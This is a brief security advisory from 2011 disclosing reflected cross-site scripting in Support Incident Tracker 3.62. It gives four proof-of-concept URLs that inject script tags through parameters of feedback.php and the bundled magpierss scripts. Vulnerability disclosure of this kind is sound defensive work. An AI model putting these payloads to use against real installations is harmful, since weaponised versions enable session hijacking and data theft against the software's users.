Support Incident Tracker 3.62 Reflected Cross-site Scripting

------------------------------------------------------------------------
Software................Support Incident Tracker 3.62
Vulnerability...........Reflected Cross-site Scripting
Threat Level............Low (1/5)
Download................http://sitracker.org/
Discovery Date..........3/3/2011
Tested On...............Windows Vista + XAMPP
------------------------------------------------------------------------
Author..................AutoSec Tools
Site....................http://www.autosectools.com/
Email...................John Leitch <john@autosectools.com>
------------------------------------------------------------------------


--Description--

A reflected cross-site scripting vulnerability in Support Incident
Tracker 3.62 can be exploited to execute arbitrary JavaScript.


--PoC--

http://localhost/sit-3.62/feedback.php?ax=--%3E%3Cscript%3Ealert(0)%3C%2fscript%3E

http://localhost/sit-3.62/lib/magpierss/scripts/magpie_debug.php?url=%22%3E%3Cscript%3Ealert(0)%3C%2fscript%3E

http://localhost/sit-3.62/lib/magpierss/scripts/magpie_simple.php?url=%22%3E%3Cscript%3Ealert(0)%3C%2fscript%3E

http://localhost/sit-3.62/lib/magpierss/scripts/magpie_slashbox.php?rss_url=%22%3E%3Cscript%3Ealert(0)%3C%2fscript%3E